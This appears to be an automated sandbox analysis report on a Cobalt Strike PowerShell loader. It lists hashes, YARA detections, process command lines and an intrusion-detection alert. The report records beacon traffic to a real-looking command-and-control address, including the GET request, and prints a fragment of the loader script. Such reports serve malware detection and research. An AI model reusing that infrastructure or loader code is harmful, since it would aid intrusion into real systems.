            Preview:...................................FL..................F.".. ...J.S...6.h.|...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...,'..|.....s.|.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.B...........................^.A.p.p.D.a.t.a...B.V.1......X.B..Roaming.@......EW<2.X.B..../.....................A...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.X.B....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.X.B....2......................Z..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.X.B....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.X.B....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X.B....u...........
            Process:C:\Windows\System32\WerFault.exe
            File Type:MS Windows registry file, NT/2000 or above
            Category:dropped
            Size (bytes):1835008
            Entropy (8bit):4.469615800274876
            Encrypted:false
            SSDEEP:6144:WzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNwjDH5S:4ZHtYZWOKnMM6bFp+j4
            MD5:35A2625B2A101D12AFC9B506235F40C6
            SHA1:583F78FE902CC649756A7B67F3947A4F330BB485
            SHA-256:676B799873632093F783FFA79666E06EB5F1EC4D4B549BAD3CF563FA60170DEA
            SHA-512:C81D1E803CBBF5B48EF82A0FCAEAFEFEDE31F4DE88CF1E1F8A1BC4FD590B3EA03D77D31A185A1DA3D78727E89E329E34A4DB2FBE6216CC2C8541C43F30E62A68
            Malicious:false
            Reputation:low
            Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....|...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            File type:ASCII text, with very long lines (1251)
            Entropy (8bit):5.89456985453275
            TrID:
              File name:TS-240622-CobaltStrike5.ps1
              File size:3'555 bytes
              MD5:464057f0e2c7f91bed00c5deb700dc93
              SHA1:42c1a7aa0e4b4bac50650288cf1648726728b35e
              SHA256:ee417a1cb4f2fa2dbb65b8a03a7e35e0a1c3215e331aa0de227e206f1e41ee8b
              SHA512:53a7976e082026e88c78c4f9e621401a515c5eda0823c76492d075d33a1630064dac282ac8b4e06c63e91a06f08bb9e597f3534b6e81f2fdd4ac87a10ac6e025
              SSDEEP:96:pg5SvvvOmVeLx1Yn64sk4w7tAcYeA0lgUV0la:SIvOPLx1YnkKtxB6M
              TLSH:2971C6685BD77D4EA8962007BC6EA8845E3C1FA7D6C63C00B9F49720E487D26D0B6B40
              File Content Preview:Set-StrictMode -Version 2..function func_get_proc_address {..Param ($var_module, $var_procedure)....$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('S
              Icon Hash:3270d6baae77db44
              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              06/22/24-10:17:00.631294TCP2037020ET TROJAN Suspected Cobalt Strike Beacon User-Agent String497118088192.168.2.6116.114.20.180
              TimestampSource PortDest PortSource IPDest IP
              Jun 22, 2024 10:17:00.626168966 CEST497118088192.168.2.6116.114.20.180
              Jun 22, 2024 10:17:00.631130934 CEST808849711116.114.20.180192.168.2.6
              Jun 22, 2024 10:17:00.631220102 CEST497118088192.168.2.6116.114.20.180
              Jun 22, 2024 10:17:00.631294012 CEST497118088192.168.2.6116.114.20.180
              Jun 22, 2024 10:17:00.636034966 CEST808849711116.114.20.180192.168.2.6
              Jun 22, 2024 10:17:02.788572073 CEST808849711116.114.20.180192.168.2.6
              Jun 22, 2024 10:17:02.788644075 CEST497118088192.168.2.6116.114.20.180
              Jun 22, 2024 10:17:02.788701057 CEST497118088192.168.2.6116.114.20.180
              Jun 22, 2024 10:17:02.793807983 CEST808849711116.114.20.180192.168.2.6
              • 116.114.20.180:8088
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.649711116.114.20.18080882276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Jun 22, 2024 10:17:00.631294012 CEST187OUTGET /aaPK HTTP/1.1
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)
              Host: 116.114.20.180:8088
              Connection: Keep-Alive
              Cache-Control: no-cache


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:04:16:57
              Start date:22/06/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TS-240622-CobaltStrike5.ps1"
              Imagebase:0x7ff6e3d50000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:true

              Target ID:1
              Start time:04:16:57
              Start date:22/06/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:6
              Start time:04:17:02
              Start date:22/06/2024
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 2276 -s 2776
              Imagebase:0x7ff760d10000
              File size:570'736 bytes
              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Reset < >
                Memory Dump Source
                • Source File: 00000000.00000002.2214371806.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd34650000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                • Instruction ID: abdb0019436fca03d90827eff5967bbbc2acd2dd284356585ef5fc48f50f2967
                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                • Instruction Fuzzy Hash: 8601677121CB0C8FD744EF4CE451AA5B7E0FB95364F10056DE58AC3652D636E891CB45
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2214371806.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd34650000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4
                • API String ID: 0-4088798008
                • Opcode ID: 0dfb605a8fb638e8ae36b219055aca895093f6a2d80f542f06b57ed70487a4e1
                • Instruction ID: 3253c59632ef8507055e9cd67fa32fb79c788380ca95a48da0022b361d69747a
                • Opcode Fuzzy Hash: 0dfb605a8fb638e8ae36b219055aca895093f6a2d80f542f06b57ed70487a4e1
                • Instruction Fuzzy Hash: 5491A666A0D6D25FE7139B2C9CB54E93F60DF53325B0900FBC698DF093EA1C280697A1
                Memory Dump Source
                • Source File: 00000000.00000002.2214371806.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd34650000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e899718e7e3e1e7eb0acf8a8fe4efa6a7b13039d97de66eebed3b367522cb275
                • Instruction ID: 8bbec0b8a25eee5eaed3b96e0479835f1a138821aa57cb4c8dc11611e7a2c194
                • Opcode Fuzzy Hash: e899718e7e3e1e7eb0acf8a8fe4efa6a7b13039d97de66eebed3b367522cb275
                • Instruction Fuzzy Hash: E5F1C231B0CA5A8FDB55DF5CC4A5BED7BE1FFAA310F1401BAC449D7292CA28A841C780
                Memory Dump Source
                • Source File: 00000000.00000002.2214371806.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd34650000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 38b511186b2503602c69a0ffe3a1c7cd04abf3d519a176237b366c2c8aff7668
                • Instruction ID: 20e317cdfa31b5c143d34886339ae3a505eb012d5563ad95e0b9535c4dd2aa72
                • Opcode Fuzzy Hash: 38b511186b2503602c69a0ffe3a1c7cd04abf3d519a176237b366c2c8aff7668
                • Instruction Fuzzy Hash: BF51636BA0D3E25FE713977D68B55EA3F94DF9312874A00F7C6C4CF0A3E909540A92A1